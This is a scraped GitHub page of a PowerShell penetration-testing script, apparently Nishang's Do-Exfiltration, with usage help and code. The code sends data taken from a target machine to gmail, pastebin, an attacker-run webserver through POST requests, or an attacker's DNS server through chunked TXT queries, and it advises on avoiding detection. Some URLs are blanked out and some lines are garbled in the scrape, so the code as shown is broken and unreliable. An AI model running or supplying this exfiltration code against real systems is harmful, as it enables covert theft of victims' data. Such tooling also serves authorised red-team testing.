Find file
e5ad0a4 Oct 2, 2016
@samratashok @FireFart
175 lines (140 sloc) 5.97 KB
function Do-Exfiltration
Use this script to exfiltrate data from a target.
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
in Utility folder of Nishang.
The data to be exfiltrated. Could be supplied by pipeline.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
The URL of the webserver where POST requests would be sent. The Webserver must beb able to log the POST requests.
The encoded values from the webserver could be decoded bby using Invoke-Decode from Nishang.
The DomainName, whose subdomains would be used for sending TXT queries to. The DNS Server must log the TXT queries.
Authoritative Name Server for the domain specified in DomainName. Using it may increase chances of detection.
Usually, you should let the Name Server of target to resolve things for you.
PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
Use above command for data exfiltration to gmail
PS > Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL
Use above command for data exfiltration to a webserver which logs POST requests.
PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName -AuthNS
Use above command for data exfiltration to a DNS server which logs TXT queries.
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[Parameter(Position = 2, Mandatory = $False)]
[Parameter(Position = 3, Mandatory = $False)]
[Parameter(Position = 4, Mandatory = $False)]
[Parameter(Position = 5, Mandatory = $False)]
[Parameter(Position = 6, Mandatory = $False)]
[Parameter(Position = 7, Mandatory = $False)]
function post_http($url,$parameters)
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$"POST", $url, $false)
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
function Compress-Encode
#Compression logic from
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Data | ForEach-Object {$sw.WriteLine($_)}
$Compressed = [Convert]::ToBase64String($ms.ToArray())
return $Compressed
if ($exfiloption -eq "pastebin")
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
$pastename = "Exfiltrated Data"
post_http "" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
elseif ($exfiloption -eq "gmail")
$smtpserver = ""
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
$msg.From = "$"
$msg.Subject = "Exfiltrated Data"
$msg.Body = $Data
if ($filename)
$att = new-object Net.Mail.Attachment($filename)
elseif ($exfiloption -eq "webserver")
$Data = Compress-Encode
post_http $URL $Data
elseif ($ExfilOption -eq "DNS")
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"